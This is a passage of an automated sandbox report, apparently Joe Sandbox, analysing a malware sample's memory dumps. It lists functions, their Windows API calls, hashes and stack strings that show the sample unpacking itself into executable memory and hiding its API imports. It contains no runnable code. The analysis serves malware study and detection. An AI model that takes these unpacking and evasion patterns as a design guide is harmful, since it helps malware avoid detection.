                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-0
                                • Opcode ID: 8211037733c935f53ab15e2385e6176317730e4017ece48f7b256e656556a34c
                                • Instruction ID: eaa29c3ad2a41dd8c71bcfc199d839c2581b2713ae206f05491fd619fbcae191
                                • Opcode Fuzzy Hash: 8211037733c935f53ab15e2385e6176317730e4017ece48f7b256e656556a34c
                                • Instruction Fuzzy Hash: 3D3158B2D001756AE7109774CC58AEBBFF6AFC1310F0981F9C88D27580D6395EC28AD2
                                Function 0041593F Relevance: 1.6, APIs: 1, Instructions: 95nativeCOMMON
                                Download Yara Rule
                                APIs
                                • NtQueryDefaultLocale.NTDLL(00000000,?), ref: 004159C9
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: DefaultLocaleQuery
                                • String ID:
                                • API String ID: 2949231068-0
                                • Opcode ID: 2ee1ef264bc4ebc8b30da043098102030a14541c61441aee103fdd9e84735800
                                • Instruction ID: 5aed80fd884622ecab96074d3f50fb13f6af1cc7fb0245db3553990cdb108002
                                • Opcode Fuzzy Hash: 2ee1ef264bc4ebc8b30da043098102030a14541c61441aee103fdd9e84735800
                                • Instruction Fuzzy Hash: F231D1B1D08669CAEB248B11CC846FABB74EF86311F2041EFC88D96641D6395AC6CF57
                                Function 02928241 Relevance: 1.5, APIs: 1, Instructions: 244memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 942d07a9f32455f821ca1e0e9bd376b5aee328b0ed915e1276cf9cd330c2db88
                                • Instruction ID: 73e41ca08a2007cee254133a24dbc01f3f5266db241cc7e64b5fd525a414bdc0
                                • Opcode Fuzzy Hash: 942d07a9f32455f821ca1e0e9bd376b5aee328b0ed915e1276cf9cd330c2db88
                                • Instruction Fuzzy Hash: 3A91D3B2D542689FF760CA10DC85BAAB779FF84310F0081FAD40DA6684D67D5EC68F62
                                Function 02941A19 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 360COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 329f5c909aefe1beb164f7bbc9f983ec8770aa4dfe7c495842918b623a36f1b7
                                • Instruction ID: b49271cb406578a054f62d98548e5dcf8b20cc35111f0b88ae02cf0b5939920f
                                • Opcode Fuzzy Hash: 329f5c909aefe1beb164f7bbc9f983ec8770aa4dfe7c495842918b623a36f1b7
                                • Instruction Fuzzy Hash: 9BE1F4B2D082A89AF7208624DC04BEA7B75EF82304F0441F9D44D67681D77E5EC5CF66
                                Function 0294164C Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 354COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: ca5a3a15578fd7cb35e0313299d088d7a98ad2ce4692f1a3aaec425f8043a175
                                • Instruction ID: 1e5058b5b0b64f03acec5aa2348086644b60bcac92fac4f515a93253d91b0329
                                • Opcode Fuzzy Hash: ca5a3a15578fd7cb35e0313299d088d7a98ad2ce4692f1a3aaec425f8043a175
                                • Instruction Fuzzy Hash: FCD1F3B2E082A89AF7218624DC04BEA7B75AF82304F0441F9D44D67681DB7E5EC5CB66
                                Function 02941CF5 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 349COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 8f2594680734045e0763b17c708b50dcfe9e0790e92f3f9c0a5bf2551c7a3156
                                • Instruction ID: e14f6ebdaf631085e7e35ac794cf80c402d68348d62e90c70f182f20c7281e5d
                                • Opcode Fuzzy Hash: 8f2594680734045e0763b17c708b50dcfe9e0790e92f3f9c0a5bf2551c7a3156
                                • Instruction Fuzzy Hash: 38D1F3B2E082A89AF7218624DC04BEA7B75AF82304F0441F9D44D67681D77E5FC5CB66
                                Function 02941252 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 348COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 5bffa4e9be23bd20b16d1e2b8295fd38089943add37232f9449f210a2491f168
                                • Instruction ID: 08d17f12f01b319d70c6077199d7819d5cf0b8de450be7216acafca8f5eec2de
                                • Opcode Fuzzy Hash: 5bffa4e9be23bd20b16d1e2b8295fd38089943add37232f9449f210a2491f168
                                • Instruction Fuzzy Hash: 16D103B2E082A89AF7218624DC04BEA7B75EF82304F0441F9D44D67681DB7E5FC5CB66
                                Function 02941A9F Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 347COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 0710a8bcf6da02d2ec5d253880a30b2cda5b122e07af4af1eac0194123f398a0
                                • Instruction ID: d46d4d95d3c450ef69a8fbe37fb877b1571e99a96056b3f9fb1a6683a3200ce9
                                • Opcode Fuzzy Hash: 0710a8bcf6da02d2ec5d253880a30b2cda5b122e07af4af1eac0194123f398a0
                                • Instruction Fuzzy Hash: 49D1E2B2E082A89AF7218624DC04BEABB75EF82304F0441F9D44D67681D77E5EC5CF66
                                Function 02941AC4 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 347COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 531af7aa381d94e9348d77a7350402a9f216f88f9002d2120ec8dad651b55d02
                                • Instruction ID: f60c4cce3a64d86ee90462e7f69b985cb6b1e4190111b62ff8df958ec1c048cc
                                • Opcode Fuzzy Hash: 531af7aa381d94e9348d77a7350402a9f216f88f9002d2120ec8dad651b55d02
                                • Instruction Fuzzy Hash: ADD1E2B2E082A89AF7218624DC04BEABB75EF82304F0441F9D44D67681D77E5EC5CF66
                                Function 02941661 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 347COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 4748c162ac8ed8f10e9d4bfcbbb33f1dfaabd6f9036f00edde7763a153658df4
                                • Instruction ID: 48b761a01ebf63b47f8b00e46964f2bc144f664f7539f17d27a27549e9f37384
                                • Opcode Fuzzy Hash: 4748c162ac8ed8f10e9d4bfcbbb33f1dfaabd6f9036f00edde7763a153658df4
                                • Instruction Fuzzy Hash: FCD103B2E082A89AF7218624DC04BEA7B75EF82304F0441F9D44D67681DB7E5FC5CB66
                                Function 02941A6D Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 347COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 901d0d0535d8119a9ba0e5843ed4a76cba05797eba58800c6b01f91fafe219f7
                                • Instruction ID: 63eb3d37ee83a005f3ef10e320c886ee82b0609e1d9ae519cb506ef5b103ac57
                                • Opcode Fuzzy Hash: 901d0d0535d8119a9ba0e5843ed4a76cba05797eba58800c6b01f91fafe219f7
                                • Instruction Fuzzy Hash: EAD1E3B2E082A89AF7218624DC04BEA7B75EF82304F0441F9D44D67681D77E5EC5CF66
                                Function 02941DB4 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 305COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 236f0a27cd8ef994ba2153c332d7ff4bcde3a6af6e6c2e725618584de05425f5
                                • Instruction ID: ae87dafef12a72cb76f7ecda834ac2cb0c34b2b37fca424c174f2a5e26a183d3
                                • Opcode Fuzzy Hash: 236f0a27cd8ef994ba2153c332d7ff4bcde3a6af6e6c2e725618584de05425f5
                                • Instruction Fuzzy Hash: B8C1E3B1E082A88AF7218624DC04BEA7B76AF92304F1440F9D44D6B281D77A5FC5CB66
                                Function 02941E04 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 284COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 6dfbcf91d1fc66b5d2e2f20e7bbcc0959b3421b6394d07373e266d952af9f9f2
                                • Instruction ID: 137e20c46aafaf94f20389c5377c27de9376d38777cc596a05527fffdb55a2d1
                                • Opcode Fuzzy Hash: 6dfbcf91d1fc66b5d2e2f20e7bbcc0959b3421b6394d07373e266d952af9f9f2
                                • Instruction Fuzzy Hash: B1C1E5B1E082A89AF7218724DC04BEABB76AF92300F0441F9C44D67681D77A5FC5CF66
                                Function 02941E17 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 278COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: de0e27ea738b0cd796495b27a45e2470d29c550de5e266718d001d33fa9a08da
                                • Instruction ID: f2bce172815d93d060e6023cee3e009d992f4d4299ae728d4bdbebe11d649c8e
                                • Opcode Fuzzy Hash: de0e27ea738b0cd796495b27a45e2470d29c550de5e266718d001d33fa9a08da
                                • Instruction Fuzzy Hash: 0BB1D3B1E082A88AFB218624CC44BEABB75AF92304F1441F9C44D67681D77A5FC5CF66
                                Function 02941E80 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 255COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                • API String ID: 0-225289630
                                • Opcode ID: 17f659ab8cedeff36e618aef461daa3decaf106131022817828a5fbfe9cf889c
                                • Instruction ID: a8f55905a79e208135e1826f8f6c39459d5d1952f5164022fdd92098e3499ea7
                                • Opcode Fuzzy Hash: 17f659ab8cedeff36e618aef461daa3decaf106131022817828a5fbfe9cf889c
                                • Instruction Fuzzy Hash: 64A1F4B1E082A88AFB218724DC04BEA7B76AF92304F0440F9D54D67681D77A4FC58F26
                                Function 029623A8 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 160COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 0-4069139063
                                • Opcode ID: a617b9d69c8bd3526c3db44b5b594c350fab43c2755de7fff67023450e37e016
                                • Instruction ID: 559be4a039485142dd5869693440019f15fc3820031854f6bc7f7c22263bbc30
                                • Opcode Fuzzy Hash: a617b9d69c8bd3526c3db44b5b594c350fab43c2755de7fff67023450e37e016
                                • Instruction Fuzzy Hash: EE511BB2D042A49AE7218724DC58BEABFB69FD1310F0940FAC88D27141D67E1ED5CF92
                                Function 0041D0C6 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 125memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000020,?), ref: 0041D1C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: E$P$R$c$e$i$o$r$s$s$t$x
                                • API String ID: 544645111-774868400
                                • Opcode ID: 48b277128dabd2e98b8f0cef37cf6b496c21e0cc8d907f55dd5f89ff52fa4faf
                                • Instruction ID: 17fd85fa94778e510e4ba98538f017c328464f37048adba6c68bc444dcef960c
                                • Opcode Fuzzy Hash: 48b277128dabd2e98b8f0cef37cf6b496c21e0cc8d907f55dd5f89ff52fa4faf
                                • Instruction Fuzzy Hash: B851E7B4D082A88FF724CB25DC84BFA7BB5AB41304F1441EAC48D66291CA795FC58F52
                                Function 02927A9A Relevance: 19.7, APIs: 1, Strings: 12, Instructions: 233memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,?), ref: 029289F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                • API String ID: 4275171209-4069139063
                                • Opcode ID: 70fb8375b45c5ae7412b64eace11c530e29f65a78e6e8c9879291720ffda4940
                                • Instruction ID: d5e50dfc13cc88509eea1878ddabbd8472975ee7e7832cf0cf0b0990e6fb501a
                                • Opcode Fuzzy Hash: 70fb8375b45c5ae7412b64eace11c530e29f65a78e6e8c9879291720ffda4940
                                • Instruction Fuzzy Hash: 8B91F5E1D582A89FF724CA20DC44BAAB679FB94310F0481FAD50D66684D67E1FC58F22
                                Function 02953091 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(00000000,?,00000040,?,?,?,?,?,?,?,?,?,?,02952B80,02952B24,00000000), ref: 029530BB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726854896.0000000002950000.00000020.00001000.00020000.00000000.sdmp, Offset: 02950000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2950000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID:
                                • API String ID: 544645111-399585960
                                • Opcode ID: a0aff51f0c9d1c1ccd1d2f9fddac5a09ea1817b872b8b4ee00e59c6481d5d531
                                • Instruction ID: b77a96e7d7005098f172e6ac24ef3ace6b2211fe07bb88da5aff00cd714a3668
                                • Opcode Fuzzy Hash: a0aff51f0c9d1c1ccd1d2f9fddac5a09ea1817b872b8b4ee00e59c6481d5d531
                                • Instruction Fuzzy Hash: 6841B2B2E04228AFF724C614DC95FFB777DEB84310F1445BAE90E96280E6395FC18A65
                                Function 02962CE5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 110memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?,?,?,?,?,?), ref: 02963342
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726873961.0000000002960000.00000020.00001000.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2960000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: O5>X
                                • API String ID: 544645111-3840307895
                                • Opcode ID: 4b91ec87659fe1da2b34c21c7fc38696fbc1fbed4f497271924b56f132bec015
                                • Instruction ID: 775ba126d3ec31652dcdece8834c7c38a2f976be08c027c97653fd0f477f6207
                                • Opcode Fuzzy Hash: 4b91ec87659fe1da2b34c21c7fc38696fbc1fbed4f497271924b56f132bec015
                                • Instruction Fuzzy Hash: 0341D4B2D402689BEB208B24DC98BEABBB5EF95310F0541F6D84D67280C7395EC1CF91
                                Function 004055F6 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,?,?,?,?,?,?), ref: 004059A3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726477640.0000000000405000.00000020.00000001.01000000.00000003.sdmp, Offset: 00405000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_405000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: A=F2
                                • API String ID: 544645111-1084960644
                                • Opcode ID: 6926762445cd1136e5d2a262dbfb03bd2b75b61dce1f089e9ff26f135629b44a
                                • Instruction ID: 9be6549bfc98a1d8e63da8af64b52cee30113e535f5a77b4f60572b85ab100c5
                                • Opcode Fuzzy Hash: 6926762445cd1136e5d2a262dbfb03bd2b75b61dce1f089e9ff26f135629b44a
                                • Instruction Fuzzy Hash: 2C31AFB1E146289FF7508A14DC95EFB77B8EB44310F1441FAE90EA6280D67D6FC08E56
                                Function 02942AA4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 91memoryCOMMON
                                Download Yara Rule
                                APIs
                                • VirtualProtect.KERNELBASE(?,?,00000040,?,00000000,?,?,?,?,?,?,?,0000006C,?,?,?), ref: 02943229
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726830476.0000000002940000.00000020.00001000.00020000.00000000.sdmp, Offset: 02940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2940000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: ProtectVirtual
                                • String ID: 396_
                                • API String ID: 544645111-2594736988
                                • Opcode ID: 9da8c366163ad420868a470d206972167c63c41253bb1c93e25da9090f90d4bd
                                • Instruction ID: 91c6b839df696f2ee8675d5d8ed76335ed46129927cea3d431654930eda5e3bc
                                • Opcode Fuzzy Hash: 9da8c366163ad420868a470d206972167c63c41253bb1c93e25da9090f90d4bd
                                • Instruction Fuzzy Hash: DB31A7F2E14154ABEB208A24DC44FEBB379EBC4310F1085F5E90D96640D7399BD58E61
                                Function 02929A0F Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 185COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: bbd8e1a53fa069131eaedc07ee44d684d8cf3fe12a5197143841c6629a7ee466
                                • Instruction ID: 3b337a0b4b2d15263accb8d50b683d2bd777a991a0e0290b173aaf6f269b7b0c
                                • Opcode Fuzzy Hash: bbd8e1a53fa069131eaedc07ee44d684d8cf3fe12a5197143841c6629a7ee466
                                • Instruction Fuzzy Hash: 05811675E052289BEB24CB14CC94BAAB7B5FF89314F2041E9E84D6B244D774AEC5CF41
                                Function 0292962E Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 164COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: bed50424591af8d9aeefffcc80fff039e74b757f9f542e32f85800ef4ca50566
                                • Instruction ID: 17ad2d0b4000158e455dad39d330e24e0a7abc68e9ff044d7082433bc582e335
                                • Opcode Fuzzy Hash: bed50424591af8d9aeefffcc80fff039e74b757f9f542e32f85800ef4ca50566
                                • Instruction Fuzzy Hash: B751B6B2E012289BFB248A55DC44BEB77B9FB89310F1480F9E80D66680D6795EC5CF91
                                Function 029296B1 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 132COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: ea5cd5b87e671b939575e1d94c0e87076672b7fee3f22a9acd5800e1dcc1e914
                                • Instruction ID: 0bd0472192a3aded8e89d05c248a70cadb721bf7989c8a22917eb0aa70ac84e1
                                • Opcode Fuzzy Hash: ea5cd5b87e671b939575e1d94c0e87076672b7fee3f22a9acd5800e1dcc1e914
                                • Instruction Fuzzy Hash: E441B4B2E012289FFB248A54DC44BEAB778FB88311F1081F9E90D66680D6795EC5CF91
                                Function 029296D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 126COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: e1e320b0ceca36ee76e958c42b84e47256c3faa666c64b18d7b43f764307f389
                                • Instruction ID: d4516e890f9e2690048cc0536a3bb5d35751ec1aec4e8926855ee991fe80d95f
                                • Opcode Fuzzy Hash: e1e320b0ceca36ee76e958c42b84e47256c3faa666c64b18d7b43f764307f389
                                • Instruction Fuzzy Hash: FA4184B1E012289BFB248A54DC54BEAB779FB89311F1040F9E90D66680D7785EC5CF91
                                Function 02929C95 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: cd18467f5d5b5d5f7a4627ffe8b9228e7dac925970f27ea60f93b42266318bd3
                                • Instruction ID: a332885e33103c3d01cb9cbb19799e3ed9e615058801a2f0c3ca6e93e57149c9
                                • Opcode Fuzzy Hash: cd18467f5d5b5d5f7a4627ffe8b9228e7dac925970f27ea60f93b42266318bd3
                                • Instruction Fuzzy Hash: 3731B271E003689BEB348A50DC44BAAB7B8FF49311F2040E9E50DA6280D7B5AEC5CF51
                                Function 02929C9A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: 4e5ca4b6d9bc23d27106acbcfbdf4af6ae0f31d3fb4dfc0b7f0386b1d32ebf21
                                • Instruction ID: 46f7a165f1eeb73870873b5c27428459d0f8d811bb1fed39bab5fed4b36f2f08
                                • Opcode Fuzzy Hash: 4e5ca4b6d9bc23d27106acbcfbdf4af6ae0f31d3fb4dfc0b7f0386b1d32ebf21
                                • Instruction Fuzzy Hash: BE215C71E017289BEB348A50DC55BAAB7B8FF49315F1041E9E50DA6284D6B4AEC4CF41
                                Function 02929CF5 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 75COMMON
                                Download Yara Rule
                                APIs
                                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02929D7E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID: FreeVirtual
                                • String ID:
                                • API String ID: 1263568516-399585960
                                • Opcode ID: 3b30f06c87f0c9d1bca0cf8a829b56a55dee7fe591085b46fda3e0d0a6202180
                                • Instruction ID: d2cf802c30c16026b7bab49957c25b5c143033ace3281c2e9b61403ea5751a26
                                • Opcode Fuzzy Hash: 3b30f06c87f0c9d1bca0cf8a829b56a55dee7fe591085b46fda3e0d0a6202180
                                • Instruction Fuzzy Hash: F3318F71E007289BEB34CA51DC45BAAB7B5FF89311F2041E9E40DA6284D6B46EC4CF41
                                Function 02929A5A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
